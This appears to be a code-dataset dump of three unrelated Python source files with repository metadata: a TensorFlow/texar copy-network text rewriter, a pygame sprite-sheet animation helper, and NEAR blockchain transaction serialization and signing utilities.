Manipulation\n3-gated copy net.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport importlib\nimport os\n\nimport numpy as np\nimport tensorflow as tf\nimport texar as tx\nfrom tensorflow.contrib.seq2seq.python.ops.beam_search_decoder import tile_batch\nfrom texar.core import get_train_op\n\nfrom copy_net import CopyNetWrapper\nfrom utils_e2e_clean import (\n    x_strs,\n    x_fields,\n    y_strs,\n    get_scope_name_of_train_op,\n    get_scope_name_of_summary_op,\n    corpus_bleu,\n)\n\n\n# pylint: disable=invalid-name, no-member, too-many-locals, global-statement\n# pylint: disable=undefined-loop-variable, unused-variable, chained-comparison\n# pylint: disable=unexpected-keyword-arg, no-value-for-parameter,\n# pylint: disable=protected-access, unused-argument, global-variable-undefined\n# pylint: disable=attribute-defined-outside-init\n\n\nclass Config:\n    copy_x = True\n    copy_y_ = False\n    attn_x = True\n    attn_y_ = True\n    expr_name = \"model/e2e_model/demo\"\n    disabled_vocab_size = 0\n    eps = 1e-10\n    add_bleu_weight = 
False\n exact_cover_w = 2.5\n\n coverage = True\n restore_from = \"\"\n rec_w = 0.8\n\n dir_summary = os.path.join(expr_name, \"log\")\n dir_model = os.path.join(expr_name, \"ckpt\")\n dir_best = os.path.join(expr_name, \"ckpt-best\")\n ckpt_model = os.path.join(dir_model, \"model.ckpt\")\n ckpt_best = os.path.join(dir_best, \"model.ckpt\")\n\n copy_flag = copy_x or copy_y_\n attn_flag = attn_x or attn_y_\n\n config_model = importlib.import_module(\n \"examples.content_rewriter.model.config_model_clean\"\n )\n config_train = importlib.import_module(\n \"examples.content_rewriter.model.config_train\"\n )\n config_data = importlib.import_module(\n \"examples.content_rewriter.model.config_data_e2e_clean\"\n )\n\n @classmethod\n def set_path(cls, path: str):\n cls.expr_name = path\n cls.dir_summary = os.path.join(cls.expr_name, \"log\")\n cls.dir_model = os.path.join(cls.expr_name, \"ckpt\")\n cls.dir_best = os.path.join(cls.expr_name, \"ckpt-best\")\n cls.ckpt_model = os.path.join(cls.dir_model, \"model.ckpt\")\n cls.ckpt_best = os.path.join(cls.dir_best, \"model.ckpt\")\n\n\ndef get_optimistic_restore_variables(ckpt_path, graph=tf.get_default_graph()):\n reader = tf.train.NewCheckpointReader(ckpt_path)\n saved_shapes = reader.get_variable_to_shape_map()\n var_names = sorted(\n [\n (var.name, var.name.split(\":\")[0])\n for var in tf.global_variables()\n if var.name.split(\":\")[0] in saved_shapes\n ]\n )\n restore_vars = []\n for var_name, saved_var_name in var_names:\n var = graph.get_tensor_by_name(var_name)\n var_shape = var.get_shape().as_list()\n if var_shape == saved_shapes[saved_var_name]:\n restore_vars.append(var)\n return restore_vars\n\n\ndef get_optimistic_saver(ckpt_path, graph=tf.get_default_graph()):\n return tf.train.Saver(\n get_optimistic_restore_variables(ckpt_path, graph=graph)\n )\n\n\ndef build_model(data_batch, data, step):\n batch_size, num_steps = [\n tf.shape(data_batch[\"x_value_text_ids\"])[d] for d in range(2)\n ]\n vocab = data.vocab(\"y_aux\")\n\n id2str = \"<{}>\".format\n bos_str, eos_str = map(id2str, (vocab.bos_token_id, vocab.eos_token_id))\n\n def single_bleu(ref, hypo):\n ref = [id2str(u if u != vocab.unk_token_id else -1) for u in ref]\n hypo = [id2str(u) for u in hypo]\n\n ref = tx.utils.strip_special_tokens(\n \" \".join(ref), strip_bos=bos_str, strip_eos=eos_str\n )\n hypo = tx.utils.strip_special_tokens(\" \".join(hypo), strip_eos=eos_str)\n\n return 0.01 * tx.evals.sentence_bleu(references=[ref], hypothesis=hypo)\n\n def batch_bleu(refs, hypos):\n return np.array(\n [single_bleu(ref, hypo) for ref, hypo in zip(refs, hypos)],\n dtype=np.float32,\n )\n\n def lambda_anneal(step_stage):\n\n print(\"==========step_stage is {}\".format(step_stage))\n if step_stage <= 1:\n rec_weight = 1\n elif step_stage > 1 and step_stage < 2:\n rec_weight = Config.rec_w - step_stage * 0.1\n return np.array(rec_weight, dtype=tf.float32)\n\n # losses\n losses = {}\n\n # embedders\n embedders = {\n name: tx.modules.WordEmbedder(\n vocab_size=data.vocab(name).size, hparams=hparams\n )\n for name, hparams in Config.config_model.embedders.items()\n }\n\n # encoders\n y_encoder = tx.modules.BidirectionalRNNEncoder(\n hparams=Config.config_model.y_encoder\n )\n x_encoder = tx.modules.BidirectionalRNNEncoder(\n hparams=Config.config_model.x_encoder\n )\n\n def concat_encoder_outputs(outputs):\n return tf.concat(outputs, -1)\n\n def encode(ref_flag):\n y_str = y_strs[ref_flag]\n sent_ids = data_batch[\"{}_text_ids\".format(y_str)]\n sent_embeds = embedders[\"y_aux\"](sent_ids)\n 
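# Embed the sentence tokens and keep the true sequence length; the\r\n        # bidirectional RNN below consumes both, and concat_encoder_outputs\r\n        # joins the forward and backward outputs along the last (feature) axis.\r\n        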
sent_sequence_length = data_batch[\"{}_length\".format(y_str)]\n sent_enc_outputs, _ = y_encoder(\n sent_embeds, sequence_length=sent_sequence_length\n )\n sent_enc_outputs = concat_encoder_outputs(sent_enc_outputs)\n\n x_str = x_strs[ref_flag]\n sd_ids = {\n field: data_batch[\"{}_{}_text_ids\".format(x_str, field)][:, 1:-1]\n for field in x_fields\n }\n sd_embeds = tf.concat(\n [\n embedders[\"x_{}\".format(field)](sd_ids[field])\n for field in x_fields\n ],\n axis=-1,\n )\n sd_sequence_length = (\n data_batch[\"{}_{}_length\".format(x_str, x_fields[0])] - 2\n )\n sd_enc_outputs, _ = x_encoder(\n sd_embeds, sequence_length=sd_sequence_length\n )\n sd_enc_outputs = concat_encoder_outputs(sd_enc_outputs)\n\n return (\n sent_ids,\n sent_embeds,\n sent_enc_outputs,\n sent_sequence_length,\n sd_ids,\n sd_embeds,\n sd_enc_outputs,\n sd_sequence_length,\n )\n\n encode_results = [encode(ref_str) for ref_str in range(2)]\n (\n sent_ids,\n sent_embeds,\n sent_enc_outputs,\n sent_sequence_length,\n sd_ids,\n sd_embeds,\n sd_enc_outputs,\n sd_sequence_length,\n ) = zip(*encode_results)\n\n # get rnn cell\n rnn_cell = tx.core.layers.get_rnn_cell(Config.config_model.rnn_cell)\n\n def get_decoder(\n cell, y__ref_flag, x_ref_flag, tgt_ref_flag, beam_width=None\n ):\n output_layer_params = (\n {\"output_layer\": tf.identity}\n if Config.copy_flag\n else {\"vocab_size\": vocab.size}\n )\n\n if Config.attn_flag: # attention\n if Config.attn_x and Config.attn_y_:\n memory = tf.concat(\n [sent_enc_outputs[y__ref_flag], sd_enc_outputs[x_ref_flag]],\n axis=1,\n )\n memory_sequence_length = None\n elif Config.attn_y_:\n memory = sent_enc_outputs[y__ref_flag]\n memory_sequence_length = sent_sequence_length[y__ref_flag]\n elif Config.attn_x:\n memory = sd_enc_outputs[x_ref_flag]\n memory_sequence_length = sd_sequence_length[x_ref_flag]\n else:\n raise Exception(\n \"Must specify either y__ref_flag or x_ref_flag.\"\n )\n attention_decoder = tx.modules.AttentionRNNDecoder(\n cell=cell,\n memory=memory,\n memory_sequence_length=memory_sequence_length,\n hparams=Config.config_model.attention_decoder,\n **output_layer_params\n )\n if not Config.copy_flag:\n return attention_decoder\n cell = (\n attention_decoder.cell\n if beam_width is None\n else attention_decoder._get_beam_search_cell(beam_width)\n )\n\n if Config.copy_flag: # copynet\n kwargs = {\n \"y__ids\": sent_ids[y__ref_flag][:, 1:],\n \"y__states\": sent_enc_outputs[y__ref_flag][:, 1:],\n \"y__lengths\": sent_sequence_length[y__ref_flag] - 1,\n \"x_ids\": sd_ids[x_ref_flag][\"value\"],\n \"x_states\": sd_enc_outputs[x_ref_flag],\n \"x_lengths\": sd_sequence_length[x_ref_flag],\n }\n\n if tgt_ref_flag is not None:\n kwargs.update(\n {\n \"input_ids\": data_batch[\n \"{}_text_ids\".format(y_strs[tgt_ref_flag])\n ][:, :-1]\n }\n )\n\n memory_prefixes = []\n\n if Config.copy_y_:\n memory_prefixes.append(\"y_\")\n\n if Config.copy_x:\n memory_prefixes.append(\"x\")\n\n if beam_width is not None:\n kwargs = {\n name: tile_batch(value, beam_width)\n for name, value in kwargs.items()\n }\n\n def get_get_copy_scores(memory_ids_states_lengths, output_size):\n memory_copy_states = [\n tf.layers.dense(\n memory_states,\n units=output_size,\n activation=None,\n use_bias=False,\n )\n for _, memory_states, _ in memory_ids_states_lengths\n ]\n\n def get_copy_scores(query, coverities=None):\n ret = []\n\n if Config.copy_y_:\n memory = memory_copy_states[len(ret)]\n if coverities is not None:\n memory = memory + tf.layers.dense(\n coverities[len(ret)],\n units=output_size,\n 
activation=None,\n use_bias=False,\n )\n memory = tf.nn.tanh(memory)\n ret_y_ = tf.einsum(\"bim,bm->bi\", memory, query)\n ret.append(ret_y_)\n\n if Config.copy_x:\n memory = memory_copy_states[len(ret)]\n if coverities is not None:\n memory = memory + tf.layers.dense(\n coverities[len(ret)],\n units=output_size,\n activation=None,\n use_bias=False,\n )\n memory = tf.nn.tanh(memory)\n ret_x = tf.einsum(\"bim,bm->bi\", memory, query)\n ret.append(ret_x)\n\n return ret\n\n return get_copy_scores\n\n covrity_dim = (\n Config.config_model.coverage_state_dim\n if Config.coverage\n else None\n )\n coverity_rnn_cell_hparams = (\n Config.config_model.coverage_rnn_cell\n if Config.coverage\n else None\n )\n cell = CopyNetWrapper(\n cell=cell,\n vocab_size=vocab.size,\n memory_ids_states_lengths=[\n tuple(\n kwargs[\"{}_{}\".format(prefix, s)]\n for s in (\"ids\", \"states\", \"lengths\")\n )\n for prefix in memory_prefixes\n ],\n input_ids=kwargs[\"input_ids\"]\n if tgt_ref_flag is not None\n else None,\n get_get_copy_scores=get_get_copy_scores,\n coverity_dim=covrity_dim,\n coverity_rnn_cell_hparams=coverity_rnn_cell_hparams,\n disabled_vocab_size=Config.disabled_vocab_size,\n eps=Config.eps,\n )\n\n decoder = tx.modules.BasicRNNDecoder(\n cell=cell,\n hparams=Config.config_model.decoder,\n **output_layer_params\n )\n return decoder\n\n def get_decoder_and_outputs(\n cell, y__ref_flag, x_ref_flag, tgt_ref_flag, params, beam_width=None\n ):\n decoder = get_decoder(\n cell, y__ref_flag, x_ref_flag, tgt_ref_flag, beam_width=beam_width\n )\n if beam_width is None:\n ret = decoder(**params)\n else:\n ret = tx.modules.beam_search_decode(\n decoder_or_cell=decoder, beam_width=beam_width, **params\n )\n return (decoder,) + ret\n\n get_decoder_and_outputs = tf.make_template(\n \"get_decoder_and_outputs\", get_decoder_and_outputs\n )\n\n def teacher_forcing(cell, y__ref_flag, x_ref_flag, loss_name):\n tgt_ref_flag = x_ref_flag\n tgt_str = y_strs[tgt_ref_flag]\n sequence_length = data_batch[\"{}_length\".format(tgt_str)] - 1\n decoder, tf_outputs, final_state, _ = get_decoder_and_outputs(\n cell,\n y__ref_flag,\n x_ref_flag,\n tgt_ref_flag,\n {\n \"decoding_strategy\": \"train_greedy\",\n \"inputs\": sent_embeds[tgt_ref_flag],\n \"sequence_length\": sequence_length,\n },\n )\n\n tgt_sent_ids = data_batch[\"{}_text_ids\".format(tgt_str)][:, 1:]\n loss = tx.losses.sequence_sparse_softmax_cross_entropy(\n labels=tgt_sent_ids,\n logits=tf_outputs.logits,\n sequence_length=sequence_length,\n average_across_batch=False,\n )\n if (\n Config.add_bleu_weight\n and y__ref_flag is not None\n and tgt_ref_flag is not None\n and y__ref_flag != tgt_ref_flag\n ):\n w = tf.py_func(\n batch_bleu,\n [sent_ids[y__ref_flag], tgt_sent_ids],\n tf.float32,\n stateful=False,\n name=\"W_BLEU\",\n )\n w.set_shape(loss.get_shape())\n loss = w * loss\n loss = tf.reduce_mean(loss, 0)\n\n if Config.copy_flag and Config.exact_cover_w != 0:\n sum_copy_probs = list(\n map(\n lambda t: tf.cast(t, tf.float32), final_state.sum_copy_probs\n )\n )\n memory_lengths = [\n lengths\n for _, _, lengths in decoder.cell.memory_ids_states_lengths\n ]\n exact_coverage_losses = [\n tf.reduce_mean(\n tf.reduce_sum(\n tx.utils.mask_sequences(\n tf.square(sum_copy_prob - 1.0), memory_length\n ),\n 1,\n )\n )\n for sum_copy_prob, memory_length in zip(\n sum_copy_probs, memory_lengths\n )\n ]\n print_xe_loss_op = tf.print(loss_name, \"xe loss:\", loss)\n with tf.control_dependencies([print_xe_loss_op]):\n for i, exact_coverage_loss in 
enumerate(exact_coverage_losses):\n print_op = tf.print(\n loss_name,\n \"exact coverage loss {:d}:\".format(i),\n exact_coverage_loss,\n )\n with tf.control_dependencies([print_op]):\n loss += Config.exact_cover_w * exact_coverage_loss\n\n losses[loss_name] = loss\n\n return decoder, tf_outputs, loss\n\n def beam_searching(cell, y__ref_flag, x_ref_flag, beam_width):\n start_tokens = (\n tf.ones_like(data_batch[\"y_aux_length\"]) * vocab.bos_token_id\n )\n end_token = vocab.eos_token_id\n\n decoder, bs_outputs, _, _ = get_decoder_and_outputs(\n cell,\n y__ref_flag,\n x_ref_flag,\n None,\n {\n \"embedding\": embedders[\"y_aux\"],\n \"start_tokens\": start_tokens,\n \"end_token\": end_token,\n \"max_decoding_length\": Config.config_train.infer_max_decoding_length,\n },\n beam_width=Config.config_train.infer_beam_width,\n )\n\n return decoder, bs_outputs\n\n decoder, tf_outputs, loss = teacher_forcing(rnn_cell, 1, 0, \"MLE\")\n rec_decoder, _, rec_loss = teacher_forcing(rnn_cell, 1, 1, \"REC\")\n rec_weight = Config.rec_w\n\n step_stage = tf.cast(step, tf.float32) / tf.constant(800.0)\n rec_weight = tf.case(\n [\n (\n tf.less_equal(step_stage, tf.constant(1.0)),\n lambda: tf.constant(1.0),\n ),\n (tf.greater(step_stage, tf.constant(2.0)), lambda: Config.rec_w),\n ],\n default=lambda: tf.constant(1.0)\n - (step_stage - 1) * (1 - Config.rec_w),\n )\n joint_loss = (1 - rec_weight) * loss + rec_weight * rec_loss\n losses[\"joint\"] = joint_loss\n\n tiled_decoder, bs_outputs = beam_searching(\n rnn_cell, 1, 0, Config.config_train.infer_beam_width\n )\n\n train_ops = {\n name: get_train_op(\n losses[name], hparams=Config.config_train.train[name]\n )\n for name in Config.config_train.train\n }\n\n return train_ops, bs_outputs\n\n\nclass Rewriter:\n def __init__(self):\n self.sess = tf.Session()\n # data batch\n self.datasets = {\n mode: tx.data.MultiAlignedData(hparams)\n for mode, hparams in Config.config_data.datas.items()\n }\n self.data_iterator = tx.data.FeedableDataIterator(self.datasets)\n self.data_batch = self.data_iterator.get_next()\n\n self.global_step = tf.train.get_or_create_global_step()\n\n self.train_ops, self.bs_outputs = build_model(\n self.data_batch, self.datasets[\"train\"], self.global_step\n )\n\n self.summary_ops = {\n name: tf.summary.merge(\n tf.get_collection(\n tf.GraphKeys.SUMMARIES,\n scope=get_scope_name_of_train_op(name),\n ),\n name=get_scope_name_of_summary_op(name),\n )\n for name in self.train_ops.keys()\n }\n\n self.saver = tf.train.Saver(max_to_keep=None)\n\n # global best_ever_val_bleu\n self.best_ever_val_bleu = 0.0\n\n def save_to(self, directory, step):\n print(\"saving to {} ...\".format(directory))\n\n saved_path = self.saver.save(self.sess, directory, global_step=step)\n\n print(\"saved to {}\".format(saved_path))\n\n def restore_from_path(self, ckpt_path):\n print(\"restoring from {} ...\".format(ckpt_path))\n\n try:\n self.saver.restore(self.sess, ckpt_path)\n except tf.errors.NotFoundError:\n print(\"Some variables are missing. 
Try optimistically restoring.\")\n (get_optimistic_saver(ckpt_path)).restore(self.sess, ckpt_path)\n\n print(\"done.\")\n\n def restore_from(self, directory):\n if os.path.exists(directory):\n ckpt_path = tf.train.latest_checkpoint(directory)\n self.restore_from_path(ckpt_path)\n\n else:\n print(\"cannot find checkpoint directory {}\".format(directory))\n\n def train_epoch(self, sess, summary_writer, mode, train_op, summary_op):\n print(\"in _train_epoch\")\n\n self.data_iterator.restart_dataset(sess, mode)\n\n feed_dict = {\n tx.global_mode(): tf.estimator.ModeKeys.TRAIN,\n self.data_iterator.handle: self.data_iterator.get_handle(\n sess, mode\n ),\n }\n\n while True:\n try:\n loss, summary = sess.run((train_op, summary_op), feed_dict)\n\n step = tf.train.global_step(sess, self.global_step)\n\n print(\"step {:d}: loss = {:.6f}\".format(step, loss))\n\n summary_writer.add_summary(summary, step)\n\n # if step % config_train.steps_per_eval == 0:\n # _eval_epoch(sess, summary_writer, 'val')\n\n except tf.errors.OutOfRangeError:\n break\n\n print(\"end _train_epoch\")\n\n def eval_epoch(self, mode):\n\n # As discussed in this thread, to use this model in an multi-thread\n # environment (such as a web server). We need to explicitly use the\n # default session:\n # https://github.com/keras-team/keras/issues/2397#issuecomment-254919212\n with self.sess.graph.as_default():\n print(\"in _eval_epoch with mode {}\".format(mode))\n\n self.data_iterator.restart_dataset(self.sess, mode)\n\n feed_dict = {\n self.data_iterator.handle: self.data_iterator.get_handle(\n self.sess, mode\n ),\n tx.global_mode(): tf.estimator.ModeKeys.EVAL,\n }\n\n step = tf.train.global_step(self.sess, self.global_step)\n\n ref_hypo_pairs = []\n fetches = [\n [self.data_batch[\"y_aux_text\"], self.data_batch[\"y_ref_text\"]],\n [\n self.data_batch[\"x_value_text\"],\n self.data_batch[\"x_ref_value_text\"],\n ],\n self.bs_outputs.predicted_ids,\n ]\n\n if not os.path.exists(Config.dir_model):\n os.makedirs(Config.dir_model)\n\n hypo_file_name = os.path.join(\n Config.dir_model, \"hypos.step{}.{}.txt\".format(step, mode)\n )\n hypo_file = open(hypo_file_name, \"w\")\n\n cnt = 0\n while True:\n try:\n target_texts, entry_texts, output_ids = self.sess.run(\n fetches, feed_dict\n )\n target_texts = [\n tx.utils.strip_special_tokens(\n texts[:, 1:].tolist(), is_token_list=True\n )\n for texts in target_texts\n ]\n entry_texts = [\n tx.utils.strip_special_tokens(\n texts[:, 1:].tolist(), is_token_list=True\n )\n for texts in entry_texts\n ]\n\n output_ids = output_ids[:, :, 0]\n output_texts = tx.utils.map_ids_to_strs(\n ids=output_ids.tolist(),\n vocab=self.datasets[mode].vocab(\"y_aux\"),\n join=False,\n )\n\n target_texts = list(zip(*target_texts))\n entry_texts = list(zip(*entry_texts))\n for ref, hypo in zip(target_texts, output_texts):\n if cnt < 10:\n print(\"cnt = {}\".format(cnt))\n for i, s in enumerate(ref):\n print(\"ref{}: {}\".format(i, \" \".join(s)))\n print(\"hypo: {}\".format(\" \".join(hypo)))\n return \"{}\".format(\" \".join(hypo))\n print(\" \".join(hypo), file=hypo_file)\n cnt += 1\n print(\"processed {} samples\".format(cnt))\n\n ref_hypo_pairs.extend(\n zip(target_texts, entry_texts, output_texts)\n )\n\n except tf.errors.OutOfRangeError:\n break\n\n hypo_file.close()\n\n refs, entrys, hypos = zip(*ref_hypo_pairs)\n\n bleus = []\n get_bleu_name = \"{}_BLEU\".format\n for i in range(1, 2):\n refs_ = list(map(lambda ref: ref[i : i + 1], refs))\n ents_ = list(map(lambda ent: ent[i : i + 1], entrys))\n entrys = 
list(zip(*entrys))\n bleu = corpus_bleu(refs_, hypos)\n bleus.append(bleu)\n\n summary = tf.Summary()\n for i, bleu in enumerate(bleus):\n summary.value.add(\n tag=\"{}/{}\".format(mode, get_bleu_name(i)),\n simple_value=bleu,\n )\n\n self.summary_writer.add_summary(summary, step)\n self.summary_writer.flush()\n\n bleu = bleus[0]\n if mode == \"val\":\n if bleu > self.best_ever_val_bleu:\n self.best_ever_val_bleu = bleu\n print(\"updated best val bleu: {}\".format(bleu))\n\n self.save_to(Config.ckpt_best, step)\n\n print(\"end _eval_epoch\")\n return\n\n def load_model(self):\n\n # As discussed in this thread, to use this model in an multi-thread\n # environment (such as a web server). We need to explicitly use the\n # default session:\n # https://github.com/keras-team/keras/issues/2397#issuecomment-254919212\n with self.sess.graph.as_default():\n self.sess.run(tf.global_variables_initializer())\n self.sess.run(tf.local_variables_initializer())\n self.sess.run(tf.tables_initializer())\n # self.sess.run(self.data_iterator)\n\n print(\"loading model \", Config.restore_from, Config.dir_model)\n\n if Config.restore_from:\n self.restore_from_path(Config.restore_from)\n else:\n self.restore_from(Config.dir_model)\n\n self.summary_writer = tf.summary.FileWriter(\n Config.dir_summary, self.sess.graph, flush_secs=30\n )\n\n epoch = 0\n while epoch < Config.config_train.max_epochs:\n name = \"joint\"\n train_op = self.train_ops[name]\n summary_op = self.summary_ops[name]\n\n step = tf.train.global_step(self.sess, self.global_step)\n\n self.train_epoch(\n self.sess,\n self.summary_writer,\n \"train\",\n train_op,\n summary_op,\n )\n\n epoch += 1\n\n step = tf.train.global_step(self.sess, self.global_step)\n self.save_to(Config.ckpt_model, step)\n","repo_name":"asyml/forte","sub_path":"examples/content_rewriter/model/manip.py","file_name":"manip.py","file_ext":"py","file_size_in_byte":26413,"program_lang":"python","lang":"en","doc_type":"code","stars":230,"dataset":"github-code","pt":"36"} +{"seq_id":"685676592","text":"import pygame\n\nclass spritesheet(object):\n def __init__(self, filename, scale_x, scale_y, IsFlip):\n self.sheet = pygame.image.load(filename)\n self.sheet = pygame.transform.scale(self.sheet, (int(self.sheet.get_width() * scale_x), int(self.sheet.get_height() * scale_y)))\n self.sheet = pygame.transform.flip(self.sheet, IsFlip, False)\n\n # Load a specific image from a specific rectangle\n def image_at(self, rectangle, colorkey = None):\n # \"Loads image from x,y,x+offset,y+offset\"\n rect = pygame.Rect(rectangle)\n image = pygame.Surface(rect.size, pygame.SRCALPHA)\n image.blit(self.sheet, (0, 0), rect)\n return image\n\n # Load a whole bunch of images and return them as a list\n def images_at(self, rects, colorkey = None):\n # \"Loads multiple images, supply a list of coordinates\" \n return [self.image_at(rect, colorkey) for rect in rects]\n \n # Load a whole strip of images\n def load_strip(self, rect, image_count, colorkey = None):\n # \"Loads a strip of images and returns them as a list\"\n tups = [(rect[0]+rect[2]*x, rect[1], rect[2], rect[3])\n for x in range(image_count)]\n return self.images_at(tups, colorkey)\n\nclass SpriteStripAnim(object):\n def __init__(self, filename, rect, count, colorkey=None, loop=False, frames=1, scale_x = 1, scale_y = 1, IsFlip = False):\n self.filename = filename\n ss = spritesheet(filename, scale_x, scale_y, IsFlip)\n self.images = ss.load_strip(rect, count, colorkey)\n self.i = 0\n self.loop = loop\n self.frames = frames\n self.f = frames\n 
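# Note: 'frames' is how many animation ticks each sprite image is shown;\n        # 'f' counts down on every next() call and advances 'i' when it\n        # reaches zero.\n        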
self.count = count\n    def iter(self):\n        self.i = 0\n        self.f = self.frames\n        return self\n    def next(self):\n        if self.i >= len(self.images):\n            if not self.loop:\n                raise StopIteration\n            else:\n                self.i = 0\n        image = self.images[self.i]\n        self.f -= 1\n        if self.f == 0:\n            self.i += 1\n            self.f = self.frames\n        return image\n    def __add__(self, ss):\n        self.images.extend(ss.images)\n        return self\n    def IsEnd(self):\n        if self.i == self.count - 1:\n            return True\n        return False","repo_name":"Tuesberry/PythonGame","sub_path":"4. ShootDefenseGame/SpriteStripAnim.py","file_name":"SpriteStripAnim.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"24526707963","text":"import hashlib\nfrom typing import Annotated\n\nfrom . import signer\nfrom .serializer import BinarySerializer\n\n\nclass FunctionCallPermission:\n    allowance: int | None\n    receiver_id: str\n    method_names: list[str]\n\n\nclass FullAccessPermission:\n    pass\n\n\nclass AccessKeyPermission:\n    enum: FunctionCallPermission | FullAccessPermission\n\n\nclass AccessKey:\n    nonce: int\n    permission: AccessKeyPermission\n\n\nclass PublicKey:\n    key_type: int\n    data: Annotated[bytes, 32]\n\n\nclass Signature:\n    key_type: int\n    data: Annotated[bytes, 64]\n\n\nclass CreateAccount:\n    pass\n\n\nclass DeployContract:\n    code: bytes\n\n\nclass FunctionCall:\n    method_name: str\n    args: bytes\n    gas: int\n    deposit: int\n\n\nclass Transfer:\n    deposit: int\n\n\nclass Stake:\n    stake: int\n    public_key: PublicKey\n\n\nclass AddKey:\n    access_key: AccessKey\n    public_key: PublicKey\n\n\nclass DeleteKey:\n    public_key: PublicKey\n\n\nclass DeleteAccount:\n    beneficiary_id: str\n\n\nclass Action:\n    enum: CreateAccount | DeployContract | FunctionCall | Transfer | Stake | AddKey | DeleteKey | DeleteAccount\n\n\nclass Transaction:\n    signer_id: str\n    public_key: PublicKey\n    nonce: int\n    receiver_id: str\n    block_hash: Annotated[bytes, 32]\n    actions: list[Action]\n\n\nclass SignedTransaction:\n    transaction: Transaction\n    signature: Signature\n\n\ntx_schema = {\n    Signature: {\n        'kind': 'struct',\n        'fields': [\n            ['key_type', 'u8'],\n            ['data', [64]],\n        ],\n    },\n    SignedTransaction: {\n        'kind': 'struct',\n        'fields': [\n            ['transaction', Transaction],\n            ['signature', Signature],\n        ],\n    },\n    Transaction: {\n        'kind': 'struct',\n        'fields': [\n            ['signer_id', 'string'],\n            ['public_key', PublicKey],\n            ['nonce', 'u64'],\n            ['receiver_id', 'string'],\n            ['block_hash', [32]],\n            ['actions', [Action]],\n        ],\n    },\n    PublicKey: {\n        'kind': 'struct',\n        'fields': [\n            ['key_type', 'u8'],\n            ['data', [32]],\n        ],\n    },\n    AccessKey: {\n        'kind': 'struct',\n        'fields': [\n            ['nonce', 'u64'],\n            ['permission', AccessKeyPermission],\n        ],\n    },\n    AccessKeyPermission: {\n        'kind': 'enum',\n        'field': 'enum',\n        'values': [\n            FunctionCallPermission,\n            FullAccessPermission,\n        ],\n    },\n    FunctionCallPermission: {\n        'kind': 'struct',\n        'fields': [\n            ['allowance', {'kind': 'option', 'type': 'u128'}],\n            ['receiver_id', 'string'],\n            ['method_names', ['string']],\n        ],\n    },\n    FullAccessPermission: {\n        'kind': 'struct',\n        'fields': [],\n    },\n    Action: {\n        'kind': 'enum',\n        'field': 'enum',\n        'values': [\n            CreateAccount,\n            DeployContract,\n            FunctionCall,\n            Transfer,\n            Stake,\n            AddKey,\n            DeleteKey,\n            DeleteAccount,\n        ],\n    },\n    CreateAccount: {\n        'kind': 'struct',\n        'fields': [],\n    },\n    DeployContract: {\n        'kind': 'struct',\n        'fields': [\n            ['code', ['u8']],\n        ],\n    },\n    FunctionCall: {\n        'kind': 'struct',\n        'fields': [\n            ['method_name', 'string'],\n            
['args', ['u8']],\n ['gas', 'u64'],\n ['deposit', 'u128'],\n ],\n },\n Transfer: {\n 'kind': 'struct',\n 'fields': [\n ['deposit', 'u128'],\n ],\n },\n Stake: {\n 'kind': 'struct',\n 'fields': [\n ['stake', 'u128'],\n ['public_key', PublicKey],\n ],\n },\n AddKey: {\n 'kind': 'struct',\n 'fields': [\n ['public_key', PublicKey],\n ['access_key', AccessKey],\n ],\n },\n DeleteKey: {\n 'kind': 'struct',\n 'fields': [\n ['public_key', PublicKey],\n ],\n },\n DeleteAccount:\n {\n 'kind': 'struct',\n 'fields': [\n ['beneficiary_id', 'string'],\n ],\n },\n}\n\n\ndef sign_and_serialize_transaction(\n receiver_id: str,\n nonce: int,\n actions: list[Action],\n block_hash: bytes,\n signer: signer.Signer,\n) -> bytes:\n assert signer.public_key is not None # TODO: Need to replace to Exception\n assert block_hash is not None # TODO: Need to replace to Exception\n tx = Transaction()\n tx.signer_id = signer.account_id\n tx.public_key = PublicKey()\n tx.public_key.key_type = 0\n tx.public_key.data = signer.public_key\n tx.nonce = nonce\n tx.receiver_id = receiver_id\n tx.actions = actions\n tx.block_hash = block_hash\n\n msg: bytes = BinarySerializer(tx_schema).serialize(tx)\n hash_: bytes = hashlib.sha256(msg).digest()\n\n signature = Signature()\n signature.key_type = 0\n signature.data = signer.sign(hash_)\n\n signed_tx = SignedTransaction()\n signed_tx.transaction = tx\n signed_tx.signature = signature\n\n return BinarySerializer(tx_schema).serialize(signed_tx)\n\n\ndef create_create_account_action() -> Action:\n create_account = CreateAccount()\n action = Action()\n action.enum = create_account\n return action\n\n\ndef create_delete_account_action(beneficiary_id: str) -> Action:\n delete_account = DeleteAccount()\n delete_account.beneficiary_id = beneficiary_id\n action = Action()\n action.enum = delete_account\n return action\n\n\ndef create_full_access_key_action(pk: bytes) -> Action:\n permission = AccessKeyPermission()\n permission.enum = FullAccessPermission()\n access_key = AccessKey()\n access_key.nonce = 0\n access_key.permission = permission\n public_key = PublicKey()\n public_key.key_type = 0\n public_key.data = pk\n add_key = AddKey()\n add_key.access_key = access_key\n add_key.public_key = public_key\n action = Action()\n action.enum = add_key\n return action\n\n\ndef create_delete_access_key_action(pk: bytes) -> Action:\n public_key = PublicKey()\n public_key.key_type = 0\n public_key.data = pk\n delete_key = DeleteKey()\n delete_key.public_key = public_key\n action = Action()\n action.enum = delete_key\n return action\n\n\ndef create_transfer_action(amount: int) -> Action:\n transfer = Transfer()\n transfer.deposit = amount\n action = Action()\n action.enum = transfer\n return action\n\n\n# TODO: deprecate usage of create_payment_action.\ncreate_payment_action = create_transfer_action\n\n\ndef create_staking_action(amount: int, pk: bytes) -> Action:\n stake = Stake()\n stake.stake = amount\n stake.public_key = PublicKey()\n stake.public_key.key_type = 0\n stake.public_key.data = pk\n action = Action()\n action.enum = stake\n return action\n\n\ndef create_deploy_contract_action(code: bytes) -> Action:\n deploy_contract = DeployContract()\n deploy_contract.code = code\n action = Action()\n action.enum = deploy_contract\n return action\n\n\ndef create_function_call_action(method_name: str, args: bytes, gas: int, deposit: int) -> Action:\n function_call = FunctionCall()\n function_call.method_name = method_name\n function_call.args = args\n function_call.gas = gas\n function_call.deposit = 
